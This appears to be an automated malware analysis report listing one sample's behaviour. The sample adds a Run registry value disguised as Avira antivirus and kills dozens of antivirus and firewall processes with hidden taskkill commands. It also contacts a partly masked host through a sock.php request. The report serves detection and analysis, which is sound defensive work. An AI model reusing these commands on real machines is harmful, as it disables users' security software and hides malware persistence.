Technical Information
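- Autorun registry value (the value name imitates a legitimate antivirus product, while the data points to an executable in the user profile): [<HKLM>\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run] 'Avira Antivirus' = '%APPDATA%\avira_av.exe'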
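- Forced termination of processes by image name (taskkill /f /im); most of the names listed are antivirus, firewall and other security-product processes:
- '%WINDIR%\syswow64\taskkill.exe' /f /im nod32krn.exe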
- '%WINDIR%\syswow64\taskkill.exe' /f /im avengine.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im pandaav.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im PavProt.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im padmin.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im PavPrSrv.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im tsc.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im pop3trap.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im tmntsrv.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im tmproxy.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im PCCTool.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im pccntupd.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im cpdclnt.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im issvc.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im nisum.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im logexprt.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im navapsvc.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im npfmntor.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im apvxdwin.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im webProxy.exe
- '%WINDIR%\syswow64\taskkill.exe' /F /IM AVGCtrl.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im realmon.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im vettray.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im VetMsg.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im InoRpc.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im caissdt.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im INOTask.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im bdswitch.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im UpdClient.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im vsserv.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im Spiderml.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im SCCOMM.EXE
- '%WINDIR%\syswow64\taskkill.exe' /f /im avsched32.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im sched.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im avgnt.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im avguard.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im norton.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im navw32.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im cccproxy.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im ashserv.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im ashmaisv.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im ashDisp.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im ashWebSv.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im avgw.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im avgupsvc.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im avgamsvr.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im avgcc.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im avgemc.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im KAVPF.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im kavmm.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im kav.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im nod32kui.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im nod32.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im ewidoctrl.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im guard.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im aswupdsv.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im gcasDtServ.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im Norton Auto-Protect.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im MsMpEng.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im ccevtmgr.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im ccsetmgr.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im ccapp.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im zlclient.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im zonealarm.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im minilog.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im bdss.exe
- '%WINDIR%\syswow64\taskkill.exe' /F /IM CSS_1630.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im zauinst.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im zapro.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im isafe.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im outpost.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im MsiExec.exe (MsiExec.exe is the Windows Installer, not a security product)
- '%WINDIR%\syswow64\taskkill.exe' /f /im mghtml.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im mcafee.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im zlcliente.exe
- '%WINDIR%\syswow64\taskkill.exe' /F /IM CSS-AVS.exe
- %APPDATA%\avira_av.exe (the same path the 'Avira Antivirus' Run value points to)
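- Network activity (the '#' characters appear to mask part of the host name and of the request in this report):
- 'da##an.nl':80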
- http://www.da##an.nl/sock.php?da########################################################################################################################################################
- DNS ASK da##an.nl (DNS query for the host)
- ClassName: '' WindowName: '' (window class and title, both recorded as empty)
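- The same taskkill command lines, recorded as launched with a hidden window (no console window is shown to the user):
- '%WINDIR%\syswow64\taskkill.exe' /f /im nod32krn.exe' (with hidden window)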
- '%WINDIR%\syswow64\taskkill.exe' /f /im avengine.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im pandaav.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im PavProt.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im padmin.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im PavPrSrv.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im tsc.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im pop3trap.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im tmntsrv.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im tmproxy.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im PCCTool.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im pccntupd.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im cpdclnt.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im issvc.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im nisum.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im logexprt.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im navapsvc.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im npfmntor.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im apvxdwin.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im webProxy.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /F /IM AVGCtrl.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im realmon.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im vettray.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im VetMsg.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im InoRpc.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im caissdt.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im INOTask.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im bdswitch.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im UpdClient.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im vsserv.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im Spiderml.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im SCCOMM.EXE' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im avsched32.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im sched.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im avgnt.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im avguard.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im norton.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im navw32.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im cccproxy.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im ashserv.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im ashmaisv.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im ashDisp.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im ashWebSv.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im avgw.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im avgupsvc.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im avgamsvr.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im avgcc.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im avgemc.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im KAVPF.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im kavmm.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im kav.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im nod32kui.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im nod32.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im ewidoctrl.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im guard.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im aswupdsv.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im gcasDtServ.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im Norton Auto-Protect.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im MsMpEng.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im ccevtmgr.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im ccsetmgr.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im ccapp.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im zlclient.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im zonealarm.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im minilog.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im bdss.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /F /IM CSS_1630.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im zauinst.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im zapro.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im isafe.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im outpost.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im MsiExec.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im mghtml.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im mcafee.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /f /im zlcliente.exe' (with hidden window)
- '%WINDIR%\syswow64\taskkill.exe' /F /IM CSS-AVS.exe' (with hidden window)